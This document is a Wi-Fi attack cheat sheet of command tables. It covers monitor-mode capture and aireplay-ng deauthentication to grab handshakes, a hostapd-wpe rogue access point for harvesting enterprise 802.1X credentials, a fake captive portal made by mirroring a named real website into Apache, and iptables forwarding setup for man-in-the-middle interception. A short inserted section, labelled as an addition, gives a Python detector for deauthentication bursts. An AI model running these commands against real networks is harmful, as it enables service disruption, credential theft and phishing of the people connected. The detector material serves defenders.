This section lists common commands used for Wi-Fi network analysis, security auditing, and setting up advanced network configurations like enterprise-level authentication and captive portals.
Normal Wi-Fi Network Analysis (Using Aircrack-ng Suite)

| Command | Description |
| --- | --- |
| `iwconfig` | Displays wireless network interface information and configuration (similar to `ifconfig`, but for wireless). |
| `airmon-ng start wlan1` | Puts the specified wireless interface (wlan1) into monitor mode to capture network traffic. A new monitor interface (often wlan1mon) is created. |
| `airodump-ng wlan1` | Starts capturing wireless traffic and displays a list of visible access points (APs) and connected clients. Note: You should use the monitor interface (e.g., wlan1mon) created in the previous step. |
| `airodump-ng wlan1 --bssid 00:08:A1:DC:BA:D3 -c 6 -w berkan` | Focuses the capture on a specific Access Point (AP) identified by its BSSID (00:08:A1:DC:BA:D3), operating on channel 6 (`-c 6`), and saves the captured data to files prefixed with berkan (`-w berkan`). |
| `aireplay-ng --deauth 10 -a 00:08:A1:DC:BA:D3 -c FE:ED:0F:55:67:18` | Sends deauthentication packets to the client with MAC address FE:ED:0F:55:67:18 from the AP with MAC address 00:08:A1:DC:BA:D3. The number 10 specifies the number of packets to send. This is often used to capture the handshake. |

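
From the defender's side, the deauthentication burst in the last row appears in a capture as many subtype-12 management frames between the same pair of addresses within a short time. The following is an added example, not part of the original page: it counts deauthentication frames per source/destination pair over constructed tab-separated capture lines (time, type/subtype, source, destination). The line format, the threshold and the window are assumptions.

```python
from collections import defaultdict, deque

DEAUTH = 12  # 802.11 management frame subtype 0x0c (deauthentication)
AP, STA = "00:08:A1:DC:BA:D3", "FE:ED:0F:55:67:18"  # addresses from the table above

# Constructed sample: epoch time, type/subtype, source, destination (tab-separated).
SAMPLE = [f"1700000000.{i}00\t0x000c\t{AP}\t{STA}" for i in range(10)] + [
    "1700000005.000\t0x0008\t" + AP + "\tff:ff:ff:ff:ff:ff",     # beacon, ignored
    "1700000010.000\t12\taa:bb:cc:00:00:01\taa:bb:cc:00:00:02",  # lone deauth
    "1700000070.000\t12\taa:bb:cc:00:00:01\taa:bb:cc:00:00:02",  # another, 60 s later
    "garbage line",                                              # malformed, skipped
]

def parse(line):
    """Return (timestamp, source, destination) for a deauth frame, else None."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 4:
        return None
    try:
        ts, subtype = float(parts[0]), int(parts[1], 0)  # accepts "12" and "0x000c"
    except ValueError:
        return None
    if subtype != DEAUTH:
        return None
    return ts, parts[2].lower(), parts[3].lower()

def find_deauth_bursts(lines, threshold=5, window=1.0):
    """Return {(source, destination): peak count} for every pair that sent
    at least `threshold` deauth frames within `window` seconds."""
    recent = defaultdict(deque)  # per-pair timestamps still inside the window
    peaks = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, dst = rec
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[(src, dst)] = max(peaks.get((src, dst), 0), len(q))
    return peaks

if __name__ == "__main__":
    for (src, dst), n in find_deauth_bursts(SAMPLE).items():
        print(f"deauth burst: {n} frames within 1 s from {src} to {dst}")
```

Enabling Protected Management Frames (802.11w) on the AP and its clients makes clients discard such unauthenticated deauthentication frames.
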
Enterprise Wi-Fi (WPA-EAP/WPA2-EAP) – Hostapd-wpe Setup
These commands are typically used to set up a Rogue AP (Access Point) for capturing Enterprise (802.1x) credentials using a tool like hostapd-wpe.

| Command | Description |
| --- | --- |
| `service NetworkManager stop` | Stops the NetworkManager service to prevent it from interfering with manual network configuration or tools like hostapd. |
| `nano /etc/hostapd-wpe/hostapd-wpe.conf` | Opens the hostapd-wpe configuration file for editing, where the Rogue AP’s parameters (SSID, channel, EAP settings, etc.) are defined. |
| `hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf` | Starts the rogue Access Point using the custom configuration file. |

Captive Portal Setup (Simple HTTP/Web Server Scenario)
These commands outline a basic setup for creating a fake Wi-Fi login page (Captive Portal) using an Apache web server.

| Command | Description |
| --- | --- |
| `wget --mirror --convert-links https://www.beyaz.net/` | Downloads (mirrors) the entire content of the specified website (https://www.beyaz.net/) and adjusts all internal links to work locally. |
| `mv * /var/www/html` | Moves all downloaded files into the Apache web server’s default root directory (/var/www/html), making them accessible via the web server. |
| `service apache2 start` | Starts the Apache web server to host the copied website (the fake Captive Portal). |

DNS Masquerading and IP Forwarding (Network Setup)
These steps configure the network interface and enable IP forwarding, which is essential for routing traffic in a man-in-the-middle (MITM) scenario, such as a Captive Portal or DNS Spoofing attack.

| Command | Description |
| --- | --- |
| `nano /proc/sys/net/ipv4/ip_forward` | Opens the kernel's IPv4 forwarding switch, which is exposed through procfs, for editing. Its content must be set to 1 to enable IP forwarding (allowing packets to pass between interfaces). This is a runtime setting and does not persist across reboots. |
| `iptables --flush` | Flushes (deletes) all rules from all chains in the filter table. |
| `iptables --table nat --flush` | Flushes (deletes) all rules from all chains in the nat (Network Address Translation) table. |
| `iptables --delete-chain` | Deletes all non-default chains in the filter table. |
| `iptables --table nat --delete-chain` | Deletes all non-default chains in the nat table. |
| `iptables -P FORWARD ACCEPT` | Sets the default policy for the FORWARD chain to ACCEPT, allowing packets to be forwarded between interfaces by default. |
| `ifconfig wlan0 10.0.0.1 netmask 255.255.255.0` | Assigns a static IP address (10.0.0.1) and subnet mask to the wireless interface (wlan0), setting it up as the gateway for the rogue network. |